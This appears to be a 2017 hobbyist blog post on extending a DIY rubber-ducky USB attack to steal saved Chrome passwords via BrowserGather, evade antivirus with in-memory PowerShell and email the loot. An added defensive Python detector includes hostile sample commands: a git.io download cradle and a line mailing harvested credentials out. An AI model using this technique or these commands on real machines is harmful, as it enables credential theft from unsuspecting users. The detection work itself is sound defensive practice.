Tuesday 21 March 2017

Further Weaponizing the Home-made Rubber Ducky

Today's post is a follow-up to my earlier one on stealing Windows credentials with a home-made rubber ducky, which you can read here. We are going to build on the existing code so that it also steals all saved Chrome logins and passwords and delivers the results in the same email!

Chrome gives users the option to save their credentials for convenience:

On Windows they are stored in your user profile directory, in an encrypted SQLite database. They are encrypted with the Windows Data Protection API (DPAPI), so any code running as the same user can decrypt them, which makes them fairly easy to recover. That is where BrowserGather comes in, a PowerShell script by sekirkity that harvests a browser's saved credentials. PowerShell is great here because everything runs in memory without touching the disk, which helps us evade AV and keeps things a lot stealthier. Sekirkity did a great job with this script: it extracts the SQLite database and decrypts the data entirely within the PowerShell session. At the moment it only supports Chrome passwords, but he is working on adding history, cookie/session data and even other browsers, so our £6.50 Rubber Ducky just keeps growing!

So let's add it to our Mimidogz script:

  • We shortened the raw GitHub download URL with:

curl -i https://git.io -F "url=https://github.com/..."

  • Then we invoke the script's Get-ChromeCreds function
  • We have to convert the Chrome results, because they come back as a PowerShell custom object, which we couldn't send via email as-is
  • Then we combine the two results into the body of the email

There we go! Just a few more lines and we have added Chrome credentials to our Windows credentials results!
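From the defender's side, the chain above leaves a recognisable trail in PowerShell script block logs. The following is an added example, not code from this post or from BrowserGather: a small Python triage routine run over constructed script block text (the shape of Event ID 4104 entries) that flags the git.io download cradle, the Get-ChromeCreds call, direct access to Chrome's Login Data database, and mailing of the results. The Chrome profile path and the mail cmdlet names (Send-MailMessage, Net.Mail.SmtpClient) are assumptions, not taken from the post.

```python
import re

# Indicators drawn from the technique in the post: a script fetched through a
# git.io short link and run in memory, BrowserGather's Get-ChromeCreds, and the
# harvested results mailed out. The Chrome profile path and the mail cmdlet
# names are assumptions, not from the post.
INDICATORS = {
    "short_link_download": re.compile(r"(?i)git\.io/\S+"),
    "download_cradle": re.compile(
        r"(?i)\b(iex|invoke-expression)\b.*(downloadstring|invoke-webrequest|\biwr\b)"
        r"|(downloadstring|invoke-webrequest|\biwr\b).*\b(iex|invoke-expression)\b"),
    "chrome_harvest": re.compile(r"(?i)get-chromecreds|browsergather"),
    "chrome_login_db": re.compile(r"(?i)\\chrome\\user data\\[^\\]+\\login data"),
    "mail_out": re.compile(r"(?i)send-mailmessage|net\.mail\.smtpclient"),
}

# Indicators that on their own point at browser credential harvesting.
HARVEST = {"chrome_harvest", "chrome_login_db"}


def match_indicators(script_block: str) -> set:
    """Return the names of every indicator present in one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_block)}


def classify(script_block: str) -> str:
    """Severity for one script block: none, low, medium or high."""
    hits = match_indicators(script_block)
    if hits & HARVEST and ("mail_out" in hits or "download_cradle" in hits):
        return "high"      # harvesting plus staging or exfiltration in one block
    if hits & HARVEST or ("download_cradle" in hits and "short_link_download" in hits):
        return "medium"    # harvest alone, or a cradle hiding its source behind a short link
    return "low" if hits else "none"


# Constructed sample script blocks (not real telemetry) in the shape of 4104 events.
SAMPLE_BLOCKS = [
    # benign admin script: downloads nothing and touches no browser data
    "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\svc.csv",
    # in-memory download cradle through a short link, as in the post (placeholder link)
    "iex (New-Object Net.WebClient).DownloadString('https://git.io/PLACEHOLDER')",
    # the post's chain in one block: harvest, flatten the custom object, mail it
    "$c = Get-ChromeCreds | Out-String; Send-MailMessage -Body ($m + $c) -To x@example.com",
    # direct copy of the profile database without BrowserGather (assumed path)
    "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" C:\\t",
]


def triage(blocks=SAMPLE_BLOCKS) -> list:
    """Classify each block; returns (severity, sorted indicator names) per block."""
    return [(classify(b), sorted(match_indicators(b))) for b in blocks]


if __name__ == "__main__":
    for severity, hits in triage():
        print(severity, hits)
```

Pairing the medium hits with the outbound SMTP connection from the same host is what turns the cradle alone into an alert worth paging on.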

Here are the results on my test VM:

Thanks for reading!
